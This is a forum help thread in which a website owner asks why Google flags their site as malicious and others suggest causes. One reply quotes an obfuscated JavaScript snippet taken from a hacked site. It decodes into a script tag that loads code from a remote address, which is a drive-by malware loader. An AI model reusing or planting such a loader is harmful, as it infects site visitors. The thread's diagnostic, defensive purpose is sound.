• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 804
  • Last Modified:

Google Warning- visiting this web site may harm your computer!

When I click on my website through Search result from Google, I get Warning

It says - visiting this web site may harm your computer!

Also it says following:-
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent.

Please let me know how to identify this issue and resolve it.
0
tps2009
Asked:
tps2009
  • 3
  • 2
1 Solution
 
techzterCommented:
Check through the code on your pages and look for something calling an external site, or a java script which is not yours.

I can't recall what they were calling this type of attack but it was growing like wildfire over the past few months. The attacks is sneaky and subtle. They don't alter the appearance of your pages at all. They just insert some code into your page and whoever hits the page unwittingly is opening themselves up for a trojan install to be put to use at a later date. If I can find some of the articles I will post them back here. In the meantime start browsing that code.

This is a sample of the code that I had found hidden in a particular site that was hacked.
### javascript hack ###

<script language=javascript><!--

document.write(unescape('hi%3C8bJsxqicridjpt%20src%3D8bJ%2Fxqi%2Fxqi9CCO4VV5%2E247%2ESB2%2E1sE9ksk5%2FjPIUqu8bJehirSBy%2EVV5jsksk%3Exqi%3Chi%2Fscdjript%3E').replace(/8bJ|dj|ksk|SB|VV5|PIU|hi|CCO|xqi|sE/g,""));

 --></script>
0
 
techzterCommented:
Beyond just the page code do you also have some java scripts that run? Make sure to check the coding within those scripts as well to make sure that they are not executing some external code.
0
 
MokonaCommented:
Thats called XSS - Cross Site Scripting

http://en.wikipedia.org/wiki/Cross-site_scripting
0
 
MokonaCommented:
To prevent that from happening you should parse all inputs and strip the <script> tag or convert all applicable characters to HTML entities.

0
 
techzterCommented:
@tps2009

How are things coming along? Have you been able to find some code that was causing your site to be flagged?
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Keep up with what's happening at Experts Exchange!

Sign up to receive Decoded, a new monthly digest with product updates, feature release info, continuing education opportunities, and more.

  • 3
  • 2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now